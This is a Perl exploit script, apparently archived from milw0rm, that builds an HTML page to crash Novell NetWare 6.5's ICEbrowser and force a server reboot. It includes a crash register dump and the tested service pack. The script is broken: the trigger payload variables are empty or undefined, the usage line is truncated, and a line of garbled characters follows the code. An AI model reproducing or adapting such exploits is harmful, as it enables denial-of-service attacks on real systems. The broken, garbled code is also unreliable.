#!/usr/bin/perl # novellnw_ib_sysdos.pl # Novell Netware 6.5 (ICEbrowser) Remote System Denial of Service Exploit # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # # "Mozilla/5.0 (NetWare; U; NetWare 6.50.06; en-US) ICEbrowser/6.1.2 NovellViewPort/3.7.2" # # After target views exploit page, the browser will sorta hang, then a fault occurs and the system reboots. # # Abend 1 on P00: Server-5.70.06: Page Fault Processor Exception (Error code 00000000) # # Registers: # CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 007B SS = 0010 # EAX = 00000000 EBX = 9687EF4C ECX = 004EB8F0 EDX = 000000E4 # ESI = 00000000 EDI = 00000001 EBP = 8D9E7F3C ESP = 86179EF4 # EIP = 00000000 FLAGS = 00010086 # # Access Location: 0x00000000 # # "Additional Information: The hardware detected a problem while executing an interrupt # service routine. The code being executed is owned by SERVER.NLM. It may be the source # of the problem or there may have been a memory corruption." # # Tested on Novell Netware 6.5 SP6 (5.70.06) $filename = $ARGV[0]; if(!defined($filename)) { print "Usage: $0 \n"; } $head = "" . "\n" . "" . "\n" . ""; $data = $head . $trig . $foot; open(FILE, '>' . $filename); print FILE $data; close(FILE); exit; # milw0rm.com [2009-01-16]

ХвАпЦ»УРѕ«Ж·КУЖµ